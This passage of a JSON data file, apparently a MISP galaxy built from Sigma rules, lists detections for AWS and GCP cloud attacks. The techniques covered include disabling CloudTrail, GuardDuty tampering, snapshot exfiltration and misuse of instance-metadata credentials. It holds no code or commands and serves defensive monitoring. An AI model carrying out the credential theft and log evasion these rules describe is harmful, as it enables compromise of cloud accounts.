"https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", "value": "AWS Route 53 Domain Transfer Lock Disabled" }, { "description": "Detects when an user attached a Lambda layer to an existing function to override a library that is in use by the function, where their malicious code could utilize the function's IAM role for AWS API calls.\nThis would give an adversary access to the privileges associated with the Lambda service role that is attached to that function.\n", "meta": { "author": "Austin Songer", "creation_date": "2021-09-23", "falsepositive": [ "Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_attached_malicious_lambda_layer.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_attached_malicious_lambda_layer.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d", "value": "AWS Attached Malicious Lambda Layer" }, { "description": "Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region.\nDisabling default encryption does not change the encryption status of your existing volumes.\n", "meta": { "author": "Sittikorn S", "creation_date": "2021-06-29", "falsepositive": [ "System Administrator Activities", "DEV, UAT, SAT environment. You should apply this rule with PROD account only." ], "filename": "aws_ec2_disable_encryption.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_disable_encryption.yml" ], "tags": [ "attack.impact", "attack.t1486", "attack.t1565" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16124c2d-e40b-4fcc-8f2c-5ab7870a2223", "value": "AWS EC2 Disable EBS Encryption" }, { "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "aws_efs_fileshare_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", "value": "AWS EFS Fileshare Modified or Deleted" }, { "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", "Automated processes that uses Terraform may lead to false positives." ], "filename": "aws_sts_assumerole_misuse.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/pull/1214", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml" ], "tags": [ "attack.lateral-movement", "attack.privilege-escalation", "attack.t1548", "attack.t1550", "attack.t1550.001" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", "value": "AWS STS AssumeRole Misuse" }, { "description": "Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.\nA change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.\n", "meta": { "author": "Michael McIntyre @wtfender", "creation_date": "2023-09-27", "falsepositive": [ "Authorized changes to the AWS account's identity provider" ], "filename": "aws_sso_idp_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html", "https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html", "https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml" ], "tags": [ "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3adb3ef-b7e7-4003-9092-1924c797db35", "value": "AWS Identity Center Identity Provider Change" }, { "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", "meta": { "author": "faloker", "creation_date": "2020-02-11", "falsepositive": [ "Valid change in the GuardDuty (e.g. to ignore internal scanners)" ], "filename": "aws_guardduty_disruption.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_guardduty_disruption.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", "value": "AWS GuardDuty Important Change" }, { "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", "meta": { "author": "Elastic, Austin Songer @austinsonger", "creation_date": "2021-07-22", "falsepositive": [ "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_route_53_domain_transferred_to_another_account.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", "value": "AWS Route 53 Domain Transferred to Another Account" }, { "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", "meta": { "author": "Darin Smith", "creation_date": "2021-05-17", "falsepositive": [ "Valid change to a snapshot's permissions" ], "filename": "aws_snapshot_backup_exfiltration.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.justice.gov/file/1080281/download", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml" ], "tags": [ "attack.exfiltration", "attack.t1537" ] }, "related": [ { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", "value": "AWS Snapshot Backup Exfiltration" }, { "description": "Detects disabling, deleting and updating of a Trail", "meta": { "author": "vitaliy0x1", "creation_date": "2020-01-21", "falsepositive": [ "Valid change in a Trail" ], "filename": "aws_cloudtrail_disable_logging.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4db60cc0-36fb-42b7-9b58-a5b53019fb74", "value": "AWS CloudTrail Important Change" }, { "description": "Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.", "meta": { "author": "daniel.bohannon@permiso.io (@danielhbohannon)", "creation_date": "2023-05-17", "falsepositive": [ "Valid usage of S3 Browser for IAM LoginProfile listing and/or creation" ], "filename": "aws_iam_s3browser_loginprofile_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1059.009", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db014773-b1d3-46bd-ba26-133337c0ffee", "value": "AWS IAM S3Browser LoginProfile Creation" }, { "description": "Detects when an instance identity has taken an action that isn't inside SSM.\nThis can indicate that a compromised EC2 instance is being used as a pivot point.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "A team has configured an EC2 instance to use instance profiles that grant the option for the EC2 instance to talk to other AWS Services" ], "filename": "aws_cloudtrail_imds_malicious_usage.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://ermetic.com/blog/aws/aws-ec2-imds-what-you-need-to-know/", "https://www.packetmischief.ca/2023/07/31/amazon-ec2-credential-exfiltration-how-it-happens-and-how-to-mitigate-it/#lifting-credentials-from-imds-this-is-why-we-cant-have-nice-things", "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_imds_malicious_usage.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1078", "attack.t1078.002" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "352a918a-34d8-4882-8470-44830c507aa3", "value": "Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure" }, { "description": "Detect when System Manager successfully executes commands against an instance.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "There are legitimate uses of SSM to send commands to EC2 instances", "Legitimate users may have to use SSM to perform actions against machines in the Cloud to update or maintain them" ], "filename": "aws_cloudtrail_ssm_malicious_usage.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_ssm_malicious_usage.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1566", "attack.t1566.002" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38e7f511-3f74-41d4-836e-f57dfa18eead", "value": "Potential Malicious Usage of CloudTrail System Manager" }, { "description": "Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.\nThis can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.\n", "meta": { "author": "Darin Smith", "creation_date": "2022-06-07", "falsepositive": [ "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" ], "filename": "aws_ecs_task_definition_cred_endpoint_query.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml" ], "tags": [ "attack.persistence", "attack.t1525" ] }, "related": [ { "dest-uuid": "4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", "value": "AWS ECS Task Definition That Queries The Credential Endpoint" }, { "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", "meta": { "author": "Diogo Braz", "creation_date": "2020-04-16", "falsepositive": "No established falsepositives", "filename": "aws_ec2_vm_export_failure.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_vm_export_failure.yml" ], "tags": [ "attack.collection", "attack.t1005", "attack.exfiltration", "attack.t1537" ] }, "related": [ { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", "value": "AWS EC2 VM Export Failure" }, { "description": "Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", "meta": { "author": "faloker", "creation_date": "2020-02-12", "falsepositive": [ "Valid changes to the startup script" ], "filename": "aws_ec2_startup_script_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1059.003", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", "value": "AWS EC2 Startup Shell Script Change" }, { "description": "Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.", "meta": { "author": "Sean Johnstone | Unit 42", "creation_date": "2023-10-28", "falsepositive": [ "AWS administrator legitimately disabling bucket versioning" ], "filename": "aws_disable_bucket_versioning.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a136ac98-b2bc-4189-a14d-f0d0388e57a7", "value": "AWS S3 Bucket Versioning Disable" }, { "description": "Detects the modification of the findings on SecurityHub.", "meta": { "author": "Sittikorn S", "creation_date": "2021-06-28", "falsepositive": [ "System or Network administrator behaviors", "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." ], "filename": "aws_securityhub_finding_evasion.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", "value": "AWS SecurityHub Findings Evasion" }, { "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-07-24", "falsepositive": [ "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "aws_s3_data_management_tampering.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", "https://github.com/elastic/detection-rules/pull/1145/files", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml" ], "tags": [ "attack.exfiltration", "attack.t1537" ] }, "related": [ { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", "value": "AWS S3 Data Management Tampering" }, { "description": "Detects the change of database master password. It may be a part of data exfiltration.", "meta": { "author": "faloker", "creation_date": "2020-02-12", "falsepositive": [ "Benign changes to a db instance" ], "filename": "aws_rds_change_master_password.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", "value": "AWS RDS Master Password Change" }, { "description": "Detects AWS Config Service disabling", "meta": { "author": "vitaliy0x1", "creation_date": "2020-01-21", "falsepositive": [ "Valid change in AWS Config Service" ], "filename": "aws_config_disable_recording.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07330162-dba1-4746-8121-a9647d49d297", "value": "AWS Config Disabling Channel/Recorder" }, { "description": "Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB).\nThis can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "Repurposing of an ELB or ALB to serve a different or additional application", "Changes to security groups to allow for new services to be deployed" ], "filename": "aws_cloudtrail_security_group_change_loadbalancer.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_loadbalancer.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a4409fc-f8ca-45f6-8006-127d779eaad9", "value": "LoadBalancer Security Group Modification" }, { "description": "Detects activity when someone is changing passwords on behalf of other users.\nAn attacker with the \"iam:UpdateLoginProfile\" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\n", "meta": { "author": "toffeebr33k", "creation_date": "2021-08-09", "falsepositive": [ "Legitimate user account administration" ], "filename": "aws_update_login_profile.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_update_login_profile.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", "value": "AWS User Login Profile Was Modified" }, { "description": "Detects changes to the security group entries for RDS databases.\nThis can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users.\n", "meta": { "author": "jamesc-grafana", "creation_date": "2024-07-11", "falsepositive": [ "Creation of a new Database that needs new security group rules" ], "filename": "aws_cloudtrail_security_group_change_rds.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_cloudtrail_security_group_change_rds.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "14f3f1c8-02d5-43a2-a191-91ffb52d3015", "value": "RDS Database Security Group Modification" }, { "description": "Detects potentially suspicious events involving \"GetSigninToken\".\nAn adversary using the \"aws_consoler\" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.\n", "meta": { "author": "Chester Le Bron (@123Le_Bron)", "creation_date": "2024-02-26", "falsepositive": [ "GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated." ], "filename": "aws_console_getsignintoken.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://github.com/NetSPI/aws_consoler", "https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_console_getsignintoken.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.007", "attack.t1550.001" ] }, "related": [ { "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8103686-e3e8-46f3-be72-65f7fcb4aa53", "value": "AWS Console GetSigninToken Potential Abuse" }, { "description": "Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"\".", "meta": { "author": "daniel.bohannon@permiso.io (@danielhbohannon)", "creation_date": "2023-05-17", "falsepositive": [ "Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value" ], "filename": "aws_iam_s3browser_templated_s3_bucket_policy_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "aws", "refs": [ "https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml" ], "tags": [ "attack.execution", "attack.t1059.009", "attack.persistence", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db014773-7375-4f4e-b83b-133337c0ffee", "value": "AWS IAM S3Browser Templated S3 Bucket Policy Creation" }, { "description": "Identifies when the Secrets are Modified or Deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-09", "falsepositive": [ "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_secrets_modified_or_deleted.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", "value": "Google Cloud Kubernetes Secrets Modified or Deleted" }, { "description": "Detects when storage bucket is enumerated in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-14", "falsepositive": [ "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_bucket_enumeration.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/storage/docs/json_api/v1/buckets", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_bucket_enumeration.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", "value": "Google Cloud Storage Buckets Enumeration" }, { "description": "Identifies when a service account is modified in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-14", "falsepositive": [ "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_service_account_modified.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ 